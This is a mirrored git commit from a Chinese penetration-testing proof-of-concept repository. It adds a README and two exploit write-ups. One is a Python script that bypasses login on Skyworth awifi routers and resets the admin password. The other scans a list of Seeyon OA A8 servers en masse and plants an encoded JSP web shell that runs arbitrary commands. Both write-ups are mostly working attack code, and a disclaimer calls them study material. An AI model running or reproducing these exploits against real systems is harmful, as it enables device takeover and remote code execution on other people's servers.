admin/Penetration_Testing_POC
1
0
Fork 0
mirror of https://github.com/Mr-xn/Penetration_Testing_POC.git synced 2025-06-20 18:00:35 +00:00
Code Issues Packages Projects Releases Wiki Activity

upload

Browse Source
This commit is contained in:
mr-xn 2019-07-24 11:51:29 +08:00
parent e9eb0169b7
commit 4ce755629e
3 changed files with 205 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

29
README.md Normal file
View File

@ -0,0 +1,29 @@
- [Penetration_Testing_POC_With_Python](#PenetrationTestingPOCWithPython)
- [IOT Device](#IOT-Device)
- [Web APP](#Web-APP)
- [Mobile APP](#Mobile-APP)
- [PC](#PC)
- [说明](#%E8%AF%B4%E6%98%8E)
# Penetration_Testing_POC_With_Python
搜集有关渗透测试中用python编写的POC、脚本
## IOT Device
- [天翼创维awifi路由器存在多处未授权访问漏洞](天翼创维awifi路由器存在多处未授权访问漏洞.md)
## Web APP
- [致远OA_A8_getshell_0day](致远OA_A8_getshell_0day.md)
## Mobile APP
- 1.xxx
## PC
- 1.xxx
## 说明
> 此项目所有文章、代码均来源于互联网,仅供学习参考使用,严禁用于任何非法行为!使用即代表你同意自负责任!

68
天翼创维awifi路由器存在多处未授权访问漏洞.md Normal file
View File

@ -0,0 +1,68 @@
### 漏洞简介
|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号|
--------|--------|---------|--------|-------|----|------|
|天翼创维awifi路由器存在多处未授权访问漏洞|2019-06-01|H4lo|[http://www.skyworth.com/](http://www.skyworth.com/)|[http://www.skyworth.com/](http://www.skyworth.com/)|Boa/0.94.14rc21|[CVE-2019-12862](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12862)|
### 漏洞详情PDF[详情](POC_Details/1.天翼创维awifi路由器存在多处未授权访问漏洞.pdf)
### POC实现代码如下
``` python
#coding: utf-8
#__author__: H4lo
import requests
import sys
payload = "authflag=1"
UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75 Safari/537.36"
headers = {
"User-Agent": UA,
"Cookie": payload
}
def exp(ip):
info = """1. Login with no password\n2. Change administrator's password\n"""
print info
op = int(raw_input("Enter the options:"))
if op == 1:
url = "http://" + str(ip)+"/home.htm"
try:
res = requests.get(url,headers=headers,timeout=5)
if "title.htm" in res.text:
print "[+] The router is vulnerable"
else:
print "[-] The router is not vulnerable"
except Exception as e:
print str(e)
elif(op == 2):
url = "http://" + str(ip) + "/boafrm/formAwifiSwitchSetup"
data = {
"olduserpass":"1",
"newpass":"123456",
"confirmnewpass":"123456",
"submit-url":"/password.htm"
}
try:
res = requests.post(url=url,headers=headers,data=data,timeout=5)
if "restartNow" in res.text:
print "[+] Password had be changed to 123456"
else:
print "[-] Some error!"
except Exception as e:
print str(e)
else:
print "error options!"
if __name__ == '__main__':
ip = sys.argv[1]
exp(ip)
```
---
### POC截图效果如下
![POC运行截图](img/1.png)

108
致远OA_A8_getshell_0day.md Normal file
View File

@ -0,0 +1,108 @@
### 漏洞简介
|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号|
--------|--------|---------|--------|-------|----|------|
|seeyon_rce致远 OA A8 getshell_0day|2019-06-26|360-CERT|[http://www.skyworth.com/](http://www.seeyon.com/) | [http://www.seeyon.com/](http://www.seeyon.com/) | A8 V7.0 SP3/V6.1 SP2|[B6-2019-062601](https://cert.360.cn/warning/detail?id=d877451a4dbebd852d01e9730d762076)|
### POC实现代码如下
```python
# Wednesday, 26 June 2019
# Author:nianhua
# Blog:https://github.com/nian-hua/
# python3 版本
import re
import requests
import base64
from multiprocessing import Pool, Manager
def send_payload(url):
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
payload = "REJTVEVQIFYzLjAgICAgIDM1NSAgICAgICAgICAgICAwICAgICAgICAgICAgICAgNjY2ICAgICAgICAgICAgIERCU1RFUD1PS01MbEtsVg0KT1BUSU9OPVMzV1lPU1dMQlNHcg0KY3VycmVudFVzZXJJZD16VUNUd2lnc3ppQ0FQTGVzdzRnc3c0b0V3VjY2DQpDUkVBVEVEQVRFPXdVZ2hQQjNzekIzWHdnNjYNClJFQ09SRElEPXFMU0d3NFNYekxlR3c0VjN3VXczelVvWHdpZDYNCm9yaWdpbmFsRmlsZUlkPXdWNjYNCm9yaWdpbmFsQ3JlYXRlRGF0ZT13VWdoUEIzc3pCM1h3ZzY2DQpGSUxFTkFNRT1xZlRkcWZUZHFmVGRWYXhKZUFKUUJSbDNkRXhReVlPZE5BbGZlYXhzZEdoaXlZbFRjQVRkTjFsaU40S1h3aVZHemZUMmRFZzYNCm5lZWRSZWFkRmlsZT15UldaZEFTNg0Kb3JpZ2luYWxDcmVhdGVEYXRlPXdMU0dQNG9FekxLQXo0PWl6PTY2DQo8JUAgcGFnZSBsYW5ndWFnZT0iamF2YSIgaW1wb3J0PSJqYXZhLnV0aWwuKixqYXZhLmlvLioiIHBhZ2VFbmNvZGluZz0iVVRGLTgiJT48JSFwdWJsaWMgc3RhdGljIFN0cmluZyBleGN1dGVDbWQoU3RyaW5nIGMpIHtTdHJpbmdCdWlsZGVyIGxpbmUgPSBuZXcgU3RyaW5nQnVpbGRlcigpO3RyeSB7UHJvY2VzcyBwcm8gPSBSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKGMpO0J1ZmZlcmVkUmVhZGVyIGJ1ZiA9IG5ldyBCdWZmZXJlZFJlYWRlcihuZXcgSW5wdXRTdHJlYW1SZWFkZXIocHJvLmdldElucHV0U3RyZWFtKCkpKTtTdHJpbmcgdGVtcCA9IG51bGw7d2hpbGUgKCh0ZW1wID0gYnVmLnJlYWRMaW5lKCkpICE9IG51bGwpIHtsaW5lLmFwcGVuZCh0ZW1wKyJcbiIpO31idWYuY2xvc2UoKTt9IGNhdGNoIChFeGNlcHRpb24gZSkge2xpbmUuYXBwZW5kKGUuZ2V0TWVzc2FnZSgpKTt9cmV0dXJuIGxpbmUudG9TdHJpbmcoKTt9ICU+PCVpZigiYXNhc2QzMzQ0NSIuZXF1YWxzKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJwd2QiKSkmJiEiIi5lcXVhbHMocmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKSl7b3V0LnByaW50bG4oIjxwcmU+IitleGN1dGVDbWQocmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKSArICI8L3ByZT4iKTt9ZWxzZXtvdXQucHJpbnRsbigiOi0pIik7fSU+NmU0ZjA0NWQ0Yjg1MDZiZjQ5MmFkYTdlMzM5MGQ3Y2U="
payload = base64.b64decode(payload)
try:
r = requests.post(url + '/seeyon/htmlofficeservlet', data=payload)
r = requests.get(
url + '/seeyon/test123456.jsp?pwd=asasd3344&cmd=cmd%20+/c+echo+wangming')
if "wangming" in r.text:
return url
else:
return 0
except:
return 0
def remove_control_chars(s):
control_chars = ''.join(map(chr, list(range(0,32)) + list(range(127,160))))
control_char_re = re.compile('[%s]' % re.escape(control_chars))
s = control_char_re.sub('', s)
if 'http' not in s:
s = 'http://' + s
return s
def savePeopleInformation(url, queue):
newurl = send_payload(url)
if newurl != 0:
fw = open('loophole.txt', 'a')
fw.write(newurl + '\n')
fw.close()
queue.put(url)
def main():
pool = Pool(10)
queue = Manager().Queue()
fr = open('url.txt', 'r')
lines = fr.readlines()
for i in lines:
url = remove_control_chars(i)
pool.apply_async(savePeopleInformation, args=(url, queue,))
allnum = len(lines)
num = 0
while True:
print(queue.get())
num += 1
if num >= allnum:
fr.close()
break
if "__main__" == __name__:
main()
```